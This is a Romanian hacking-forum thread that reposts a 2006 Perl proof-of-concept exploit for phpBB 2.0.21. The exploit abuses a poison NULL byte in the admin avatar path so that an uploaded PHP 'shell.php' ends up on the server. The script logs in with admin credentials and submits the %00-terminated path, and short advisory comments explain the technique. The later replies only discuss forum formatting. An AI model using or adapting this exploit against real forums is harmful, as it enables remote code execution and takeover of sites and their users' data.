phpBB 2 0 21 Poison NULL Byte Remote Exploit

Hacking and more...
HaCkinG CulT

Lista Forumurilor Pe Tematici

Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.

Nou pe simpatie:
Manuela25 pe Simpatie.ro

Femeie
25 ani
Bucuresti
cauta Barbat
25 - 62 ani

Hacking and more... / Exploituri si POCs / phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit

Moderat de Shocker

Autor

Mesaj

Pagini: 1

vgteam
Grand Master

Inregistrat: acum 17 ani
Postari: 219

#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian):
#
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
#
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#

use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}

# milw0rm.com [2006-09-11]

Modificat de Shocker (acum 17 ani)

_______________________________________
HACKPEDIA project
stage: strangerea de fonduri :d

pus acum 17 ani

vgteam
Grand Master

Inregistrat: acum 17 ani
Postari: 219

in loc de

era semnul care se pune la acest zambet

_______________________________________
HACKPEDIA project
stage: strangerea de fonduri :d

pus acum 17 ani

Shocker
Super Moderator

Din: localhost
Inregistrat: acum 18 ani
Postari: 2084

Stim... am modificat eu. Data viitoare cand mai postezi si vrei sa nu faca in loc de : ) >

debifeaza casuta Converteste smilies in icoane

_______________________________________
ShockingSoft is back
Freakz only
Comics of the day

pus acum 17 ani

hfhun
Elite Member

Inregistrat: acum 18 ani
Postari: 593

Sau pune intre [ code ] si [ /code ]

Modificat de hfhun (acum 17 ani)

_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto

pus acum 17 ani

Pagini: 1

Mergi la